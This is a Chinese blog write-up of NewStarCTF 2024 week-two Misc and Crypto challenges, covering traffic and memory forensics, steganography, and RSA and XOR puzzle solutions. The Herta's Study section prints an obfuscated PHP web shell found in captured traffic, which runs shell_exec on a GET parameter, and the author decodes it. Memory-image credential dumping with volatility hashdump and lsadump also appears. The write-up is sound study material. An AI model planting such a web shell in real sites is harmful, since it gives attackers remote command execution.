NewStarCtf 2024第二周writeup-1(Misc+Crypto)
仍然是部分wp,可以按照导航自行查看,没有的部分我后面会做了可能会补上Orz
第二周题目都无法作答了才来看看题,所以做题的时候有搜到师傅的wp(
标题-1是因为写着写着我的标题格式出问题了但是我不会在博客园里改,所以week2的其它题目放到-2里。不过其他类型的题目我也不会做多少就是了(
Misc
wireshark_checkin
看题目是http流量,导入wireshark,然后搜http。
发现有向服务器请求flag.txt的信息,看response,得到flag。
flag{ez_traffic_analyze_isn't_it}
wireshark_secret
好好好看涩图,也是http流量。
请求了秘密图片,在相应报文里查看这部分,获得flag。
flag{you_are_gooddddd}
热心助人的小明同学
之前没接触过内存取证,所以现学现卖.jpg
在kali里装了volatility和mimikatz插件。
先是用imageinfo查看系统信息:vol.py -f image.raw imageinfo
然后去获取密码的hash值:
vol.py -f image.raw --profile=Win7SP1x86 hashdump
拿着hash值去md5网站(https://www.somd5.com/)解密,没解出来。
继续搜索发现说是mimikatz插件可以解密,但是跑了下也没跑出来。
又去搜发现可以用lsadump去获取密码(vol.py -f image.raw --profile=Win7SP1x86 lsadump),获取到下面的东西:
但是感觉这部分也没有什么逻辑,之后又试着去看了下进程,实在没思路了去看了别的师傅的wp,发现flag就是上图红框部分。
flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}
用溯流仪见证伏特台风
浏览器插件wayback mechine,要用梯子sad。
所以去搜了下关键词Threatmon和伏特台风,找到了一个图片较为清晰的版本(
框框里的文字是:powerj7kmpzkdhjg4szvcxxgktgk36ezpjxvtosylrpey7svpmrjyuyd.onion
文字----16位小写的的MD5运算-->6c3ea51b6f9d4f5e
flag{6c3ea51b6f9d4f5e}
你也玩原神吗
是张gif图片,用StegSolve打开,在Analyse里选择FrameBrowser,然后提取图片。
原本以为是丘丘语,搜了下之后找了个提瓦特语言对照表,翻译了下中间的文字,但是感觉没用,所以去翻译四角的文字。
解出来是这么一串:asentence iiaaelgtsfkfa doyouknowfence mesioaabgnhnsgogmyeiade
fence:围栏,猜测栅栏密码(其实是我搜前半段看到别的师傅的wp了
把后面那段拿去枚举,得到:maybegenshinisagoodgame
flag{maybegenshinisagoodgame}
字里行间的秘密
哇这个我怎么都想不到,我最开始以为key.txt是个莫名其妙的文件,我甚至把flag.docx改成flag.zip解压了,获得了两个encryptpackage和encryptinfo的文件。
去百度感觉是微软自带的加密方法,也没懂。
去看了下师傅的wp,key.txt采用的是零宽字节加密。
用工具跑了下,key是:it_is_k3y
然后解锁doc文件,获得flag。
很好笑的是我一直把软件开护眼模式,所以一打开就看到了(x
flag{you_h4ve_4nyth1n9}
Herta's Study
查看流量,感觉是文件上传(?),上传了个脚本然后连接服务器,脚本内容如下:
1 <?php 2 3 $payload=$_GET['payload']; 4 $payload=shell_exec($payload); 5 $bbb=create_function( 6 base64_decode('J'.str_rot13('T').'5z'), 7 base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRpKz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQogICAgfQ0KfQ0KcmV0dXJuICRuczs==')); 8 echo $bbb($payload); 9 10 ?>
str_rot13() 函数对字符串执行 ROT13 编码。
ROT13 编码是把每一个字母在字母表中向前移动 13 个字母得到。数字和非字母字符保持不变。
"."是php里的连接符,所以上传的php代码其实为:
(之前用create_function 的时候vscode一直报错,去查了下好像这个已经停用了,改了下没有报错了)
1 <?php 2 $payload = $_GET['payload']; 3 $payload = shell_exec($payload); 4 $bbb = function ($ns) { 5 $ns = base64_encode($ns); 6 for ($i = 0; $i < strlen($ns); $i++) { 7 if ($i % 2 == 1) { 8 $ns[$i] = str_rot13($ns[$i]); 9 } 10 } 11 return $ns; 12 }; 13 echo $bbb($payload); 14 ?>
根据代码,可以看到,得出的结果经过base64编码,然后把里面的奇数位字符用str_rot13编码了。
然后去找到请求flag的包,解码,但是发现是fake flag。
后来去找了下f.txt,解出来flag:flag{sH3_i4_S0_6eAut1fuL.}
1 <?php 2 $result='ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt=='; 3 $bbb=function ($ns) { 4 for ($i = 0; $i < strlen($ns); $i++) { 5 if ($i % 2 == 1) { 6 $ns[$i] = str_rot13($ns[$i]); 7 } 8 } 9 return $ns; 10 }; 11 echo base64_decode($bbb($result)); 12 ?>
Crypto
这是几次方? 疑惑!
是个python代码,如下:
1 from Crypto.Util.number import * 2 3 flag = b'flag{*****}' 4 p = getPrime(512) 5 q = getPrime(512) 6 n = p*q 7 e = 65537 8 9 m = bytes_to_long(flag) 10 c = pow(m, e, n) 11 12 hint = p^e + 10086 13 14 print("c =", c) 15 print("[n, e] =", [n, e]) 16 print("hint =", hint) 17 ''' 18 c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762 19 [n, e] = [124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261, 65537] 20 hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531673390 21 '''
分析上述代码:
getPrime(512):取两个512位的质数;
c=pow(m,e,n):c=m的e次方mod n。这个是rsa运算求密文,所以明文m=密文n的私钥d次方mod n,即为:
m=pow(c,d,n)
目前已知c,n,e,求d。
在rsa里,ed的关系是e*d modφ = 1 mod φ。
φ=(p-1)*(q-1)
去这个网站把n分解成pq:http://www.factordb.com/index.php
可以求出φ。
那么就要用到gmpy2这个库了!
φ) # invert(e,n)返回d使得e * d == 1 mod n,如果不存在d,则返回01 from Crypto.Util.number import * 2 import gmpy2 3 4 c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762 5 n = 124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261 6 hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531663304 7 e = 65537 8 q=9894080171409167477731048775117450997716595135307245061889351408996079284609420327696692120762586015707305237750670080746600707139163744385937564246995541 9 p=12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531598921 10 kk=(p-1)*(q-1) 11 # kk=124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102547272582607556946597809819206498583700587629821896578436377540232328729792993693280980361351684844458558344121591584147825245121367422062684374122308816800 12 13 d = gmpy2.invert(e,kk) 14 d= 22611589977370520102188494132173206662182894540575368174403027280708176548743712414509190973164201319228760596652928358557224295975095230681067496021808078343144195007103821354677774261541360191905462400209949218721814339047952228144496950320622160175823856053884916779719061830624839737774087658005009858273 15 m=pow(c,d,n) 16 # m=264482712154170621062930777958510103708372984838245841047957012723716220867587500009954604988711976936661501831365621134205 17 flag=long_to_bytes(m) 18 print(flag)
Since you konw something
题目代码如下:
1 from pwn import xor 2 #The Python pwntools library has a convenient xor() function that can XOR together data of different types and lengths 3 from Crypto.Util.number import bytes_to_long 4 5 key = ?? #extremely short 6 FLAG = 'flag{????????}' 7 c = bytes_to_long(xor(FLAG,key)) 8 9 print("c={}".format(c)) 10 11 ''' 12 c=218950457292639210021937048771508243745941011391746420225459726647571 13 '''
还是异或。
已知c,题目中说key很短,求flag。
已知flag格式为:flag{xxx},又说key很短,那么可不可以根据"flag{"求出key。
异或是按位运算的,我拿着flag{,就应该和c0的前五位运算,即:\x08\x1f\x0f\x14\x15
但是算出来不对,所以我把{去掉了,得出key,求出key之后,再运算,得出flag:flag{Y0u_kn0w_th3_X0r_b3tt3r}
1 from pwn import xor 2 from Crypto.Util.number import bytes_to_long,long_to_bytes 3 4 c=218950457292639210021937048771508243745941011391746420225459726647571 5 c0=long_to_bytes(c) 6 c1=c0[:4] 7 flag=b'flag' 8 key=xor(c1,flag) 9 flag = xor(c0,key) 10 print(flag
茶里茶气(没做出来)
题目代码:
1 from Crypto.Util.number import * 2 3 flag = "flag{*****}" 4 assert len( flag ) == 25 5 6 a = "" 7 for i in flag: 8 a += hex(ord(i))[2:] 9 l = int(a,16).bit_length() 10 print("l =" , l ) 11 12 v0 = int(a,16)>>(l//2) 13 v1 = int(a,16)-(v0<<(l//2)) 14 p = getPrime(l//2+10) 15 16 v2 = 0 17 derta = 462861781278454071588539315363 18 v3 = 489552116384728571199414424951 19 v4 = 469728069391226765421086670817 20 v5 = 564098252372959621721124077407 21 v6 = 335640247620454039831329381071 22 assert v1 < p and v0 < p and derta < p and v3 < p and v4 < p and v5 < p and v6 < p 23 24 for i in range(32): 25 v1 += (v0+v2) ^ ( 8*v0 + v3 ) ^ ( (v0>>7) + v4 ) ; v1 %= p 26 v0 += (v1+v2) ^ ( 8*v1 + v5 ) ^ ( (v1>>7) + v6 ) ; v0 %= p 27 v2 += derta ; v2 %= p 28 29 print( "p =" , p ) 30 print( "v0 =" , v0 ) 31 print( "v1 =" , v1 ) 32 33 """ 34 l = 199 35 p = 446302455051275584229157195942211 36 v0 = 190997821330413928409069858571234 37 v1 = 137340509740671759939138452113480 38 """
看起来有点麻烦,整理下能够从代码里看到的信息:
(1)flag长度是25;
(2)ord(i)是取字母的ascii值,hex 16进制,[2:]猜测是取的0x后面的值,所以a就是把flag的ascii值的16进制的一个字符串;
(3)int(a,16),把a这个16机制数转为10进制,然后这个值的二进制长度是l,l=199;
(4)l//2=99,>>和<<都是位运算,对二进制进行移位操作。<<左移,末尾补0,>>右移,相当于/2。
那么>>99:/2的99次方。v0=a的ascii值的集合/2的99次方;
(5)v0的值后面补99个0,所以v1的值是a的ascii值的集合-2的100次方;
(6)p是一个109位的素数,且vxx<p。
(7)然后就不会做了,卡在了v0%=p上。
just one and more than two
老规矩先发一下题目代码:
1 from Crypto.Util.number import * 2 3 flag = b'flag{?????}' 4 m1 = bytes_to_long(flag[:len(flag)//2]) 5 m2 = bytes_to_long(flag[len(flag)//2:]) 6 e = 65537 7 p, q, r= (getPrime(512) for _ in range(3)) 8 N=p*q*r 9 c1 = pow(m1, e, p) 10 c2 = pow(m2, e, N) 11 12 print(f'p={p}\nq={q}\nr={r}\nc1={c1}\nc2={c2}') 13 14 ''' 15 p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133 16 q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393 17 r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371 18 c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451 19 c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445 20 '''
由题,可以看出flag是两部分拼接出来的,pqr分别是512位的素数。已知pqr那么N也可以求出来。又因为c1=pow(m1,e,p),c2=pow(m2,e,N),感觉私钥d也可以求出来。
kk=(p-1)*(q-1)
d=gmpy2.invert(e,kk)由此就可以求出m1,m2。
然后我得出了m1和m2,但是m2不是正常的字符串,我尝试着把N改成了p*q,得出了flag。
这里不晓得为什么要这么改,如果有师傅看到这里可以不吝赐教_(:з」∠)_
1 from Crypto.Util.number import * 2 import gmpy2 3 p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133 4 q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393 5 r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371 6 c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451 7 c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445 8 e = 65537 9 N=p*q 10 11 kk=(p-1)*(q-1) 12 d=gmpy2.invert(e,kk) 13 14 m1=long_to_bytes(pow(c1,d,p)) 15 # flag{Y0u_re4lly_kn0w_Eule 16 m2=long_to_bytes(pow(c2,d,N)) 17 # r_4nd_N3xt_Eu1er_is_Y0u!} 18 print(m1,'\n',m2)
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)